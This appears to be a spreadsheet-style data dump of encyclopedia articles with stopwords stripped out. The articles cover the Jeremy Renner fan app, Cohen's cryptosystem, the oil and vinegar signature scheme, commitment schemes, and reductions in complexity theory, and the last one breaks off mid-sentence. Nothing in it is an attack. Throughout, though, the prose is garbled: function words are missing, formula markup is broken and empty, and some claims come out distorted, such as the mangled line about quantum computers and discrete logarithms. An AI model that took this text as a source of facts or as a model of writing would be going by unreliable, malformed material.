    <t>jeremy renner official jeremy renner google play store) application created american actor jeremy renner. created march 2017 hear input comments fans. shut september 2019 part frequent bullying trolling platform experienced. featured optional microtransactions whose numbers could reach roughly four hundred dollars, despite free. upon shutting app, renner issued mass-refund collectible 'stars' within ninety-day period purchase. posted apology itself, deleted google play store store shortly after. usage upon downloading app, user faced video renner speaking fans superfans, regular giveaways, real-life updates. while active, renner posted regular questions comments fans. renner occasionally livestreamed work day-to-day life. community developed include memes, selfies, "happy rennsday" event wednesdays. history 2017–2019 launched march 2017 promotional contest. renner's fans encouraged download create comments renner's biggest fan; renner would choose winner transport winner guest lunch calgary expo. first months renner teased behind-the-scenes projects working sporadically instagram. similarly designed instagram well, near identically styled layout. around midway 2019, hoax account renner made mock celebrity, joking masturbating porn defending another hoax account casey anthony.fastcompany wrote extensively renner's april 2019, calling surprising kind social media". ringer stated "jeremy renner's jeremy renner jeremy renner apps." after deletion (2019–2020) after shutdown app, comedy-based pseudo-app modular endings released, called "the jeremy renner experience", player plays jeremy renner jeremy renner official app's shutdown. details several different choices renner handles situation. six-part podcast also created mock app's deletion, called renner files, featuring carolyn goldfarb sarah ramos. controversies marketing main controversies renner's marketing. app's developers, escapex, specialized grew famous making similar monetized apps celebrities. marketing campaign based direct contact renner, whose chances increased regular payments "stars", although encounters seemed happen renner himself. multiple problems escapex, sephi shapira, call "freak situation", said situation "did concern her". along marketing failures, seen misrepresenting seemingly erotic advertisements featuring renner suggestively staring camera, despite actual initially considered safe children. harassment after release 2017, waves harassment bullying many users app, frequently using impersonation referenced renner's apology/deletion notice. some death threats made across fraud accounts pretending several controversial celebrities, including simpson casey anthony.as early october 2017, claims censorship, bullying, "contest-rigging". september 2019, comedian stefan heck publicized discovery fact replies appeared sent renner push notifications. after several users abused feature, renner asked escapex shut app. references</t>
  </si>
  <si>
    <t>Cohen's cryptosystem</t>
  </si>
  <si>
    <t>cohen's cryptosystem public-key cryptosystem proposed 1998 bram cohen. generation cohen's cryptosystem, private positive integer {\displaystyle algorithm uses {\displaystyle public-keys {\displaystyle w_{0},\ldots ,w_{k-1}} defined follows: generate {\displaystyle random integers {\displaystyle u_{0},\ldots ,u_{k-1}} chosen randomly uniformly {\displaystyle {\displaystyle where {\displaystyle bound. {\displaystyle a=\lfloor {\frac {p}{2k}}\rfloor generate {\displaystyle random integers {\displaystyle v_{0},\ldots ,v_{k-1}} chosen randomly uniformly {\displaystyle {\displaystyle define {\displaystyle w_{i}=(u_{i}p+v_{i})} encrypting encrypt {\displaystyle alice randomly adds {\displaystyle {\frac {k}{2}}} public keys multiplies result either wishes send wishes send obtain ciphertext {\displaystyle c=(-1)^{m}\sum w_{i}} de-cryption de-crypt, computes {\displaystyle h=c\mod p=(-1)^{m}\sum v_{i}} easy {\displaystyle m=0} {\displaystyle 0&lt;h&lt;p/2} however, {\displaystyle m=1} {\displaystyle p&gt;h&gt;p/2} hence read sent alice significant references</t>
  </si>
  <si>
    <t>Unbalanced oil and vinegar scheme</t>
  </si>
  <si>
    <t>cryptography, unbalanced vinegar (uov) scheme modified version vinegar scheme designed patarin. both digital signature protocols. they forms multivariate cryptography. security signature scheme based np-hard mathematical problem. create validate signatures, minimal quadratic equation system must solved. solving equations variables np-hard. while problem easy either much much larger much much smaller importantly cryptographic purposes, problem thought difficult average case nearly equal, even using quantum computer. multiple signature schemes devised based multivariate equations goal achieving quantum resistance. significant drawback size large. typically number variables, chosen double number equations. encoding coefficients equations requires considerable space, least kilobytes system would offer security comparable digital signature algorithm elliptic curve digital signature algorithm. signing verification signature scheme signing key, kept private, verification key, publicly revealed. instance, signature schemes based keys exponents. scheme, every multivariate signature scheme keys complex. mathematical problem solve {\displaystyle equations {\displaystyle variables. whole equations system public key. mathematical problem cryptography, must modified. computing {\displaystyle variables would need resources. standard computer able compute acceptable time. therefore, special trapdoor inserted equations system. this trapdoor signing key. consists three parts: affine transformations {\displaystyle {\displaystyle polynomial vector {\displaystyle {\acute {p}}} both transformations used transform elements certain groups. {\displaystyle transforms {\displaystyle {\displaystyle y_{1},y_{2},...,y_{n}} second transformation {\displaystyle transforms variable vector valid signature. third secret element {\displaystyle {\acute {p}}} provides certain tools equations' creation. equations built rules known owner signing key. signature creation create valid signature, following equations system solved {\displaystyle {\begin{aligned}y_{1}&amp;=f_{1}(x_{1},\ldots ,x_{n})\\y_{2}&amp;=f_{2}(x_{1},\ldots ,x_{n})\\&amp;~\vdots \\y_{m}&amp;=f_{m}(x_{1},\ldots ,x_{n})\\\end{aligned}}} here {\displaystyle y=(y_{1},y_{2},\ldots ,y_{m})} given message signed. valid signature {\displaystyle x=(x_{1},x_{2},\ldots ,x_{n})} sign given {\displaystyle message must first transformed equations system. {\displaystyle used "split" message acceptable pieces {\displaystyle y_{1},y_{2},\ldots ,y_{m}} then equations built. every single equation form: {\displaystyle y_{i}=\sum {\gamma _{ijk}a_{j}{\acute {a}}_{k}}+\sum {\lambda _{ijk}{\acute {a}}_{j}{\acute {a}}_{k}}+\sum {\xi _{ij}a_{j}}+\sum {{\acute {\xi }}_{ij}{\acute {a}}_{j}}+\delta _{i}} next steps sign given message {\displaystyle result valid signature {\displaystyle coefficients, {\displaystyle \gamma _{ijk},\lambda _{ijk},\xi _{ij},{\acute {\xi }}_{ij},\delta _{i}} must chosen secretly. vinegar variables {\displaystyle {\acute {a}}_{j}} chosen randomly resulting linear equations system gets solved variables {\displaystyle a_{i}} )the vinegar variables build pre-signature {\displaystyle a=(a_{1},\ldots ,a_{n},{\acute {a}}_{1},\ldots ,{\acute {a}}_{v})} finally {\displaystyle gets transformed private transformation {\displaystyle give valid signature {\displaystyle x=s^{-1}(a)} system equations becomes linear vinegar variables fixed variable multiplied another variable equation. therefore, variables computed easily using, example, gaussian reduction algorithm. signature creation fast computationally easy. signature validation signature transmitted communication partner. validation signature performed help public key, equations system. {\displaystyle {\begin{aligned}y_{1}&amp;={f_{1}}^{*}(x_{1},x_{2},\ldots ,x_{n})\\y_{2}&amp;={f_{2}}^{*}(x_{1},x_{2},\ldots ,x_{n})\\&amp;~\vdots \\y_{m}&amp;={f_{m}}^{*}(x_{1},x_{2},\ldots ,x_{n})\\\end{aligned}}} this system equations slightly modified version system needed signature creation. modified attacker cannot information secret coefficients special formatting vinegar variables. every equation public solved validate signature. input signature itself. every result {\displaystyle y_{i}} equal corresponding part original message, verification succeeded. problems advantages primary advantage mathematical problem solved algorithm quantum-resistant. when quantum computer built factor large composite numbers using shor's algorithm, break commercial signature schemes like elgamal rely upon discrete logarithm problem unsolvable. remain secure algorithm known give quantum computer great advantage solving multivariate systems equations. second advantage operations used equations relatively simple. signatures created validated addition multiplication "small" values, making signature viable low-resource hardware found smart cards. disadvantage uses long key-lengths, public involving entire system {\displaystyle equations, require several hundred kilobytes. used widely. while several attack methods already known, appear becomes widely used. ready commercial security requires investigation. rainbow cryptosystem based three finalists nist competition post-quantum digital signature standard, though significant concerns recently brought light regarding security proposed nist competition. minrank attack rainbow discovered, reduces security proposed rainbow instantiation level requirements nist. beullens discovered attack 2022, recovers private rainbow parameterset weekend. affected attack. references external links buchmann, johannes; coronado, carlos; doring, martin; engelbert, daniela; ludwig, christoph; overbeck, raphael; schmidt, arthur; vollmer, ulrich; weinmann, ralf-philipp: post-quantum signatures, october 2004 wolf, christopher: multivariate quadratic polynomials public cryptography, diamant/eidma symposium 2005 braeken, wolf, christopher; preneel, bart: study security unbalanced vinegar signature schemes, esat-cosic, september 2004 coron, jean-sebastien; weger, benne: hardness main computational problems used cryptography, ecrypt d.aztec.6, march 2007 kipnis, aviad: unbalanced vinegar signature schemes extended version, euro-crypt, 1999 faugère, jean-charles perret, ludovic. security uov. cryptology eprint archive. report 2009/483. 2009</t>
  </si>
  <si>
    <t>Commitment scheme</t>
  </si>
  <si>
    <t>commitment scheme cryptographic primitive allows commit chosen value chosen statement) keeping hidden others, ability reveal committed value later. commitment schemes designed party cannot change value statement committed commitment schemes binding. commitment schemes important applications number cryptographic protocols including secure coin flipping, zero-knowledge proofs, secure computation. visualize commitment scheme think sender putting message locked box, giving receiver. message hidden receiver, cannot open lock themselves. since receiver box, message inside cannot changed—merely revealed sender chooses give later time. interactions commitment scheme take place phases: commit phase value chosen committed reveal phase value revealed sender, receiver verifies authenticityin metaphor, commit phase sender putting message box, locking reveal phase sender giving receiver, uses open verify contents. locked commitment, proof. simple protocols, commit phase consists single message sender receiver. this message called commitment. essential specific value chosen cannot known receiver time (this called hiding property). simple reveal phase would consist single message, opening, sender receiver, followed check performed receiver. value chosen commit phase must sender compute validates reveal phase (this called binding property). concept commitment schemes perhaps first formalized gilles brassard, david chaum, claude crepeau 1988, part various zero-knowledge protocols based various types commitment schemes (see also:). concept used prior without treated formally. notion commitments appeared earliest works manuel blum, shimon even, shamir terminology seems originated blum, although commitment schemes interchangeably called commitment schemes—sometimes reserved special case committed value bit. earlier that, commitment one-way hash functions considered, e.g., part say, lamport signature, original one-time one-bit signature scheme. applications coin flipping suppose alice want resolve dispute coin flipping. physically place, typical procedure might alice "calls" coin flip flips coin alice's call correct, wins, otherwise winsif alice place problem arises. once alice "called" coin flip, stipulate flip "results" whatever desirable him. similarly, alice announce "call" bob, flips coin announces result, alice report called whatever result desirable her. alice commitments procedure allow trust outcome: alice "calls" coin flip tells commitment call, flips coin reports result, alice reveals committed verifies alice's call matches commitment, alice's revelation matches coin result reported, alice winsfor able skew results favor, must able understand call hidden alice's commitment. commitment scheme good one, cannot skew results. similarly, alice cannot affect result cannot change value commits real-life application problem exists, people (often media) commit decision give answer "sealed envelope", opened later. "let's find that's candidate answered", example game show, serve model system. zero-knowledge proofs particular motivating example commitment schemes zero-knowledge proofs. commitments used zero-knowledge proofs main purposes: first, allow prover participate "cut choose" proofs verifier presented choice learn, prover reveal corresponds verifier's choice. commitment schemes allow prover specify information advance, reveal revealed later proof. second, commitments also used zero-knowledge proofs verifier, often specify choices ahead time commitment. this allows zero-knowledge proofs composed parallel without revealing additional information prover. signature schemes lamport signature scheme digital signature system relies maintaining sets secret data packets, publishing verifiable hashes data packets, selectively revealing partial secret data packets manner conforms specifically data signed. way, prior public commitment secret values becomes critical part functioning system. because lamport signature system cannot used (see relevant article details), system combine many lamport key-sets single public value tied person verified others developed. this system uses trees hashes compress many published lamport-key-commitments sets single hash value associated prospective author later verified data. verifiable secret sharing another important application commitments verifiable secret sharing, critical building block secure multiparty computation. secret sharing scheme, several parties receive "shares" value meant hidden everyone. enough parties together, shares used reconstruct secret, even malicious cabal insufficient size learn nothing. secret sharing root many protocols secure computation: order securely compute function shared input, secret shares manipulated instead. however, shares generated malicious parties, important shares checked correctness. verifiable secret sharing scheme, distribution secret accompanied commitments individual shares. commitments reveal nothing help dishonest cabal, shares allow individual party check shares correct. defining security formal definitions commitment schemes vary strongly notation flavour. first flavour whether commitment scheme provides perfect computational security respect hiding binding properties. another flavour whether commitment interactive, i.e. whether commit phase reveal phase seen executed cryptographic protocol whether non-interactive, consisting algorithms commit checkreveal. latter case checkreveal often seen derandomised version commit, randomness used commit constituting opening information. commitment value computed c:=commit(x,open) open randomness used computing commitment, checkreveal (c,x,open) simply consists verifying equation c=commit (x,open). using notation knowledge mathematical functions probability theory formalise different versions binding hiding properties commitments. important combinations properties perfectly binding computationally hiding commitment schemes computationally binding perfectly hiding commitment schemes. note commitment scheme time perfectly binding perfectly hiding computationally unbounded adversary simply generate commit(x,open) every value open finding pair outputs perfectly binding scheme uniquely identifies computational binding open chosen size {\displaystyle 2^{k}} i.e., represented string, commit {\displaystyle {\text{commit}}_{k}} corresponding commitment scheme. size determines security commitment scheme called security parameter. then non-uniform probabilistic polynomial time algorithms output {\displaystyle x,x'} {\displaystyle open,open'} increasing length probability {\displaystyle x\neq commit commit {\displaystyle {\text{commit}}_{k}(x,open)={\text{commit}}_{k}(x',open')} negligible function this form asymptotic analysis. also possible state requirement using concrete security: commitment scheme commit {\displaystyle (t,\epsilon secure, algorithms time output {\displaystyle x,x',open,open'} probability {\displaystyle x\neq commit commit {\displaystyle {\text{commit}}(x,open)={\text{commit}}(x',open')} {\displaystyle \epsilon perfect, statistical, computational hiding {\displaystyle u_{k}} uniform distribution {\displaystyle 2^{k}} opening values security parameter commitment scheme respectively perfect, statistical, computational hiding, {\displaystyle x\neq probability ensembles commit {\displaystyle \{{\text{commit}}_{k}(x,u_{k})\}_{k\in \mathbb commit {\displaystyle \{{\text{commit}}_{k}(x',u_{k})\}_{k\in \mathbb equal, statistically close, computationally indistinguishable. impossibility universally composable commitment schemes impossible realize commitment schemes universal composability (uc) framework. reason commitment extractable, shown canetti fischlin explained below. ideal commitment functionality, denoted works roughly follows. committer sends value stores sends "receipt" receiver later, sends "open" sends now, assume protocol realizes functionality. suppose committer corrupted. framework, essentially means controlled environment, attempts distinguish protocol execution ideal process. consider environment chooses message tells prescribed committed note order realize receiver must, receiving commitment, output message "receipt". after environment sees message, tells open commitment. protocol secure scenario indistinguishable ideal case, functionality interacts simulator here, control particular, whenever outputs "receipt", likewise. tell send value however, note point, known hence, commitment opened protocol execution, unlikely open unless extract messages received environment outputs receipt. however protocol extractable sense cannot statistically hiding. suppose simulator exists. consider environment that, instead corrupting corrupts instead. additionally runs copy messages received replies forwarded environment initially tells commit message point interaction, commit value message handed outputs note assumption high probability. ideal process simulator come impossible, point commitment opened yet, message received ideal process "receipt" message. thus contradiction. construction commitment scheme either perfectly binding impossible alice alter commitment made even unbounded computational resources); perfectly concealing impossible find commitment without alice revealing even unbounded computational resources); formulated instance-dependent commitment scheme, either hiding binding depending solution another problem. commitment scheme hiding binding time. bit-commitment random oracle model bit-commitment schemes trivial construct random oracle model. given hash function output, commit k-bit message alice generates random string sends h(r||m). probability exist h(r′||m′) h(r||m) 2−k, test guess message need make (for incorrect guess) 2k-1 average, correct guess) queries random oracle. note earlier schemes based hash functions, essentially thought schemes based idealization hash functions random oracle. bit-commitment one-way permutation create bit-commitment scheme one-way function injective. scheme relies fact every one-way function modified (via goldreich-levin theorem) possess computationally hard-core predicate (while retaining injective property). injective one-way function, hard-core predicate. then commit alice picks random input sends triple {\displaystyle (h,f(x),b\oplus h(x))} bob, {\displaystyle \oplus denotes xor, i.e., bitwise addition modulo decommit, alice simply sends bob. verifies computing f(x) comparing committed value. this scheme concealing recover must recover h(x). since computationally hard-core predicate, recovering h(x) f(x) probability greater one-half hard inverting perfect binding follows fact injective thus f(x) exactly preimage. bit-commitment pseudo-random generator note since know construct one-way permutation one-way function, section reduces strength cryptographic assumption necessary construct bit-commitment protocol. 1991 moni naor showed create bit-commitment scheme cryptographically secure pseudorandom number generator. construction follows. pseudo-random generator takes bits bits, alice wants commit selects random 3n-bit vector sends alice. alice selects random n-bit vector computes 3n-bit vector g(y). alice sends g(y) bob, otherwise sends bitwise exclusive-or g(y) bob.to decommit alice sends bob, check whether initially received g(y) g(y) {\displaystyle \oplus this scheme statistically binding, meaning even alice computationally unbounded cannot cheat probability greater 2−n. alice cheat, would need find g(y') g(y) {\displaystyle \oplus could find value, could decommit sending truth send opposite answer however, g(y) g(y') able produce possible values (that's 22n) picked values. pick 22n/23n probability satisfying equation required cheat exist. concealing property follows standard reduction, tell whether alice committed zero one, also distinguish output pseudo-random generator true-random, contradicts cryptographic security perfectly binding scheme based discrete problem beyond alice chooses ring prime order multiplicative generator alice randomly picks secret value commit calculates publishes discrete logarithm problem dictates computationally infeasible compute assumption, cannot compute hand, alice cannot compute scheme binding. this scheme perfectly concealing someone could find commitment manages solve discrete logarithm problem. fact, scheme hiding respect standard hiding game, adversary unable guess messages chose committed similar ind-cpa game. consequence space possible values small, attacker could simply commitment would hiding. better example perfectly binding commitment scheme commitment encryption semantically secure, public-key encryption scheme perfect completeness, decommitment string random bits used encrypt example information-theoretically hiding commitment scheme pedersen commitment scheme, computationally binding discrete logarithm assumption. additionally scheme above, uses another generator prime group random number commitment {\displaystyle c=g^{x}h^{r}} .these constructions tightly related based algebraic properties underlying groups, notion originally seemed much related algebra. however, shown basing statistically binding commitment schemes general unstructured assumption possible, notion interactive hashing commitments general complexity assumptions (specifically originally, based permutation) perfectly hiding commitment scheme based alice selects {\displaystyle {\displaystyle n=p\cdot {\displaystyle {\displaystyle large secret prime numbers. additionally, selects prime {\displaystyle {\displaystyle e&gt;n^{2}} {\displaystyle gcd(e,\phi (n^{2}))=1} alice computes public number {\displaystyle g_{m}} element maximum order {\displaystyle \mathbb _{n^{2}}^{*}} group. finally, alice commits secret {\displaystyle first generating random number {\displaystyle {\displaystyle \mathbb _{n^{2}}^{*}} computing {\displaystyle c=m^{e}g_{m}^{r}} security commitment relies hardness problem perfect hiding computational binding. additive multiplicative homomorphic properties commitments pedersen commitment scheme introduces interesting homomorphic property allows performing addition commitments. more specifically, given messages {\displaystyle m_{1}} {\displaystyle m_{2}} randomness {\displaystyle r_{1}} {\displaystyle r_{2}} respectively, possible generate commitment that: {\displaystyle c(m_{1},r_{1})\cdot c(m_{2},r_{2})=c(m_{1}+m_{2},r_{1}+r_{2})} formally: {\displaystyle c(m_{1},r_{1})\cdot c(m_{2},r_{2})=g^{m_{1}}h^{r_{1}}\cdot g^{m_{2}}h^{r_{2}}=g^{m_{1}+m_{2}}h^{r_{1}+r_{2}}=c(m_{1}+m_{2},r_{1}+r_{2})} open pedersen commitment message {\displaystyle m_{1}+m_{2}} randomness {\displaystyle r_{1}} {\displaystyle r_{2}} added. similarly, rsa-based commitment mentioned homomorphic property respect multiplication operation. given messages {\displaystyle m_{1}} {\displaystyle m_{2}} randomness {\displaystyle r_{1}} {\displaystyle r_{2}} respectively, compute: {\displaystyle c(m_{1},r_{1})\cdot c(m_{2},r_{2})=c(m_{1}\cdot m_{2},r_{1}+r_{2})} formally: {\displaystyle c(m_{1},r_{1})\cdot c(m_{2},r_{2})=m_{1}^{e}g_{m}^{r_{1}}\cdot m_{2}^{e}g_{m}^{r_{2}}=(m_{1}\cdot m_{2})^{e}g_{m}^{r_{1}+r_{2}}=c(m_{1}\cdot m_{2},r_{1}+r_{2})} open commitment message {\displaystyle m_{1}\cdot m_{2}} randomness {\displaystyle r_{1}} {\displaystyle r_{2}} added. this newly generated commitment distributed similarly commitment {\displaystyle m_{1}\cdot m_{2}} partial reveal some commitment schemes permit proof given portion committed value. schemes, secret value {\displaystyle vector many individually separable values. {\displaystyle x=(x_{1},x_{2},...,x_{n})} commitment {\displaystyle computed {\displaystyle commit phase. normally, reveal phase, prover would reveal {\displaystyle additional proof data (such {\displaystyle simple bit-commitment). instead, prover able reveal single value {\displaystyle vector, create efficient proof authentic {\displaystyle element original vector created commitment {\displaystyle proof require values {\displaystyle {\displaystyle x_{i}} revealed, impossible create valid proofs reveal different values {\displaystyle x_{i}} true one. vector hashing vector hashing naive vector commitment partial reveal scheme based bit-commitment. values {\displaystyle m_{1},m_{2},...m_{n}} chosen randomly. individual commitments created hashing {\displaystyle y_{1}=h(x_{1}||m_{1}),y_{2}=h(x_{2}||m_{2}),...} overall commitment computed {\displaystyle c=h(y_{1}||y_{2}||...||y_{n})} order prove element vector {\displaystyle prover reveals values {\displaystyle (i,y_{1},y_{2},...,y_{i-1},x_{i},m_{i},y_{i+1},...,y_{n})} verifier able compute {\displaystyle y_{i}} {\displaystyle x_{i}} {\displaystyle m_{i}} able verify hash {\displaystyle values commitment {\displaystyle this scheme inefficient since proof {\displaystyle o(n)} size verification time. alternately, {\displaystyle {\displaystyle values, commitment {\displaystyle o(n)} size, proof {\displaystyle o(1)} size verification time. either way, commitment proof scales {\displaystyle o(n)} merkle tree common example practical partial reveal scheme merkle tree, binary hash tree created elements {\displaystyle this scheme creates commitments {\displaystyle o(1)} size, proofs {\displaystyle o(\log _{2}{n})} size verification time. root hash tree commitment {\displaystyle prove revealed {\displaystyle x_{i}} part original tree, {\displaystyle \log _{2}{n}} hash values tree, level, must revealed proof. verifier able follow path claimed leaf node root, hashing sibling nodes level, eventually arriving root node value must equal {\displaystyle commitment kate-zaverucha-goldberg commitment uses pairing-based cryptography build partial reveal scheme {\displaystyle o(1)} commitment sizes, proof sizes, proof verification time. words, {\displaystyle number values {\displaystyle increases, commitments proofs larger, proofs take effort verify. commitment requires predetermined parameters create pairing, trusted trapdoor element. example, tate pairing used. assume {\displaystyle \mathbb _{1},\mathbb _{2}} additive groups, {\displaystyle \mathbb _{t}} multiplicative group pairing. words, pairing {\displaystyle e:\mathbb _{1}\times \mathbb _{2}\rightarrow \mathbb _{t}} {\displaystyle t\in \mathbb _{p}} trapdoor element {\displaystyle prime order {\displaystyle \mathbb _{1}} {\displaystyle \mathbb _{2}} {\displaystyle {\displaystyle generators {\displaystyle \mathbb _{1}} {\displaystyle \mathbb _{2}} respectively. part parameter setup, assume {\displaystyle g\cdot t^{i}} {\displaystyle h\cdot t^{i}} known shared values arbitrarily many positive integer values {\displaystyle trapdoor value {\displaystyle discarded known one. commit commitment reformulates vector values committed polynomial. first, calculate polynomial {\displaystyle p(i)=x_{i}} values {\displaystyle x_{i}} vector. lagrange interpolation allows compute polynomial {\displaystyle p(x)=\sum _{i=0}^{n-1}x_{i}\prod _{0\leq j&lt;n,j\neq i}{\frac {x-j}{i-j}}} under formulation, polynomial encodes vector, {\displaystyle p(0)=x_{0},p(1)=x_{1},...} {\displaystyle p_{0},p_{1},...,p_{n-1}} coefficients {\displaystyle {\textstyle p(x)=\sum _{i=0}^{n-1}p_{i}x^{i}} commitment calculated {\displaystyle c=\sum _{i=0}^{n-1}p_{i}gt^{i}} this computed simply product predetermined values {\displaystyle g\cdot t^{i}} polynomial coefficients {\displaystyle p_{i}} since {\displaystyle \mathbb _{1}} additive group associativity commutativity, {\displaystyle equal simply {\displaystyle g\cdot p(t)} since additions multiplications {\displaystyle distributed evaluation. since trapdoor value {\displaystyle unknown, commitment {\displaystyle essentially polynomial evaluated number known one, outcome obfuscated opaque element {\displaystyle \mathbb _{1}} reveal proof must demonstrate revealed data authentic value {\displaystyle x_{i}} {\displaystyle computed. {\displaystyle y=x_{i}} revealed value must prove. since vector {\displaystyle x_{i}} reformulated polynomial, really need prove polynomial {\displaystyle evaluated {\displaystyle takes value {\displaystyle simply, need prove {\displaystyle p(i)=y} demonstrating subtracting {\displaystyle {\displaystyle yields root {\displaystyle define polynomial {\displaystyle {\displaystyle q(x)={\frac {p(x)-y}{x-i}}} this polynomial proof {\displaystyle p(i)=y} {\displaystyle exists, {\displaystyle p(x)-y} divisible {\displaystyle x-i} meaning root {\displaystyle {\displaystyle p(i)-y=0} (or, words, {\displaystyle p(i)=y} proof demonstrate {\displaystyle exists property. prover computes {\displaystyle polynomial division, calculates proof value {\displaystyle {\displaystyle =\sum _{i=0}^{n-1}q_{i}gt^{i}} this equal {\displaystyle g\cdot q(t)} above. words, proof value polynomial {\displaystyle evaluated trapdoor value {\displaystyle hidden generator {\displaystyle {\displaystyle \mathbb _{1}} this computation possible polynomials evenly divisible, case quotient {\displaystyle polynomial, rational function. construction trapdoor, possible evaluate rational function trapdoor value, evaluate polynomial using linear combinations precomputed known constants {\displaystyle g\cdot t^{i}} this impossible create proof incorrect value {\displaystyle x_{i}} verify verify proof, bilinear pairing used show proof value {\displaystyle summarizes real polynomial {\displaystyle demonstrates desired property, {\displaystyle p(x)-y} evenly divided {\displaystyle x-i} verification computation checks equality {\displaystyle e(\pi ,h\cdot t-h\cdot {\stackrel {?}{=}}\ e(c-g\cdot y,h)} {\displaystyle bilinear function above. {\displaystyle h\cdot precomputed constant, {\displaystyle h\cdot computed based {\displaystyle rewriting computation pairing group {\displaystyle \mathbb _{t}} substituting {\displaystyle =q(t)\cdot {\displaystyle c=p(t)\cdot letting {\displaystyle \tau (x)=e(g,h)^{x}} helper function lifting pairing group, proof verification clear {\displaystyle e(\pi ,h\cdot t-h\cdot i)=e(c-g\cdot y,h)} {\displaystyle e(g\cdot q(t),h\cdot t-h\cdot i)=e(g\cdot p(t)-g\cdot y,h)} {\displaystyle e(g\cdot q(t),h\cdot (t-i))=e(g\cdot (p(t)-y),h)} {\displaystyle e(g,h)^{q(t)\cdot (t-i)}=e(g,h)^{p(t)-y}} {\displaystyle \tau (q(t)\cdot (t-i))=\tau (p(t)-y)} assuming bilinear validly constructed, demonstrates {\displaystyle q(x)(x-i)=p(x)-y} without validator knowing {\displaystyle {\displaystyle are. validator assured {\displaystyle \tau (q(t)\cdot (t-i))=\tau (p(t)-y)} polynomials evaluate output trapdoor value {\displaystyle x=t} this demonstrates polynomials identical, because, parameters validly constructed, trapdoor value known one, meaning engineering polynomial specific value trapdoor impossible (according schwartz–zippel lemma). {\displaystyle q(x)(x-i)=p(x)-y} verified true, {\displaystyle verified exist, therefore {\displaystyle p(x)-y} must polynomial-divisible {\displaystyle (x-i)} {\displaystyle p(i)-y=0} factor theorem. this proves {\displaystyle value committed vector must equaled {\displaystyle since output evaluating committed polynomial {\displaystyle additionally, commitment extended prove values arbitrary {\displaystyle values {\displaystyle (not value), proof size remaining {\displaystyle o(1)} proof verification time scales {\displaystyle o(k)} proof same, instead subtracting constant {\displaystyle subtract polynomial causes multiple roots, locations want prove, instead dividing {\displaystyle x-i} divide {\textstyle \prod _{i}x-i} locations. quantum commitment interesting question quantum cryptography unconditionally secure commitment protocols exist quantum level, protocols least asymptotically) binding concealing even restrictions computational resources. could hope might exploit intrinsic properties quantum mechanics, protocols unconditionally secure distribution. however, impossible, dominic mayers showed 1996 (see original proof). protocol reduced protocol system pure states commitment phase, depending alice wants commit. protocol unconditionally concealing, alice unitarily transform states using properties schmidt decomposition, effectively defeating binding property. subtle assumption proof commit phase must finished point time. this leaves room protocols require continuing information flow unveiled protocol cancelled, case binding anymore. more generally, mayers' proof applies protocols exploit quantum physics special relativity. kent shown exist unconditionally secure protocols commitment exploit principle special relativity stating information cannot travel faster light. commitments based physical unclonable functions physical unclonable functions (pufs) rely physical internal randomness, hard clone emulate. electronic, optical types pufs discussed extensively literature, connection potential cryptographic applications including commitment schemes. also oblivious transfer accumulator (cryptography) signing party trust zerocoin references external links quantum commitment arxiv.org kate-zaverucha-goldberg (kzg) constant-sized polynomial commitments alin tomescu kate polynomial commitments</t>
  </si>
  <si>
    <t>Reduction (complexity)</t>
  </si>
  <si>
    <t>computability theory computational complexity theory, reduction algorithm transforming problem another problem. sufficiently efficient reduction problem another used show second problem least difficult first. intuitively, problem reducible problem algorithm solving problem efficiently existed) could also used subroutine solve problem efficiently. when true, solving cannot harder solving "harder" means higher estimate required computational resources given context (e.g., higher time complexity, greater memory requirement, expensive need extra hardware processor cores parallel solution compared single-threaded solution, etc.). existence reduction written shorthand notation usually subscript indicate type reduction used mapping reduction, polynomial reduction). mathematical structure generated problems reductions particular type generally forms preorder, whose equivalence classes used define degrees unsolvability complexity classes. introduction there main situations need reductions: first, find trying solve problem similar problem we've already solved. cases, often quick solving problem transform instance problem instances problem, solve using existing solution, obtain final solution. this perhaps obvious reductions. second: suppose problem we've proven hard solve, similar problem. might suspect also hard solve. argue contradiction: suppose problem easy solve. then, show every instance problem solved easily transforming instances problem solving those, contradiction. this establishes problem also hard.a simple example reduction multiplication squaring. suppose know add, subtract, take squares, divide two. knowledge, combined following formula, obtain product numbers: {\displaystyle a\times b={\frac {\left(\left(a+b\right)^{2}-a^{2}-b^{2}\right)}{2}}} also reduction direction; obviously, multiply numbers, square number. this seems imply problems equally hard. this kind reduction corresponds turing reduction. however, reduction becomes much harder restriction squaring function time, end. case, even we're allowed basic arithmetic operations, including multiplication, reduction exists general, order desired result square compute square root first, square root could irrational number like {\displaystyle {\sqrt {2}}} cannot constructed arithmetic operations rational numbers. going direction, however, certainly square number multiplication, end. using limited form reduction, shown unsurprising result multiplication harder general squaring. this corresponds many-one reduction. properties reduction preordering, reflexive transitive relation, p(n)×p(n), p(n) power natural numbers. types applications reductions described example above, main types reductions used computational complexity, many-one reduction turing reduction. many-one reductions instances problem instances another; turing reductions compute solution problem, assuming problem easy solve. many-one reduction stronger type turing reduction, effective separating problems distinct complexity classes. however, increased restrictions many-one reductions make difficult find. problem complete complexity class every problem class reduces problem, also class itself. sense problem represents class, since solution can, combination reductions, used solve every problem class. however, order useful, reductions must easy. example, quite possible reduce difficult-to-solve np-complete problem like boolean satisfiability problem trivial problem, like determining number equals zero, reduction machine solve problem exponential time output zero solution. however, achieve much, even though solve problem, performing reduction hard solving problem. likewise, reduction computing noncomputable function reduce undecidable problem decidable one. michael sipser points introduction theory computation: "the reduction must easy, relative complexity typical problems class [...] reduction difficult compute, easy solution complete problem necessarily yield easy solution problems reducing it." therefore, appropriate notion reduction depends complexity class studied. when studying complexity class harder classes polynomial hierarchy, polynomial-time reductions used. when studying classes within log-space reductions used. reductions also used computability theory show whether problems solvable machines all; case, reductions restricted computable functions. case optimization (maximization minimization) problems, often think terms approximation-preserving reduction. suppose optimization problems instances problem mapped onto instances other, nearly optimal solutions instances latter problem transformed back yield nearly optimal solutions former. this way, optimization algorithm approximation algorithm) finds near-optimal optimal) solutions instances problem efficient approximation-preserving reduction problem problem composition obtain optimization algorithm yields near-optimal solutions instances problem approximation-preserving reductions often used prove hardness approximation results: optimization problem hard approximate (under complexity assumption) within factor better β-approximation-preserving reduction problem problem conclude problem hard approximate within factor α/β. examples show decision problem undecidable must find reduction decision problem already known undecidable that reduction function must computable function. particular, often show problem undecidable showing halting problem reduces complexity classes pspace closed (many-one, "karp") polynomial-time reductions. complexity classes pspace closed log-space reduction. detailed example following example shows reduction halting problem prove language undecidable. suppose h(m, problem determining whether given turing machine halts accepting rejecting) input string this language known undecidable. suppose e(m) problem determining whether language given turing machine accepts empty words, whether accepts strings all). show undecidable reduction obtain contradiction, suppose decider produce decider (which know exist). given input turing machine input string), define s(m, following behavior: creates turing machine accepts input string halts input halt otherwise. decider evaluate r(n) check whether language accepted empty. accepts language accepted 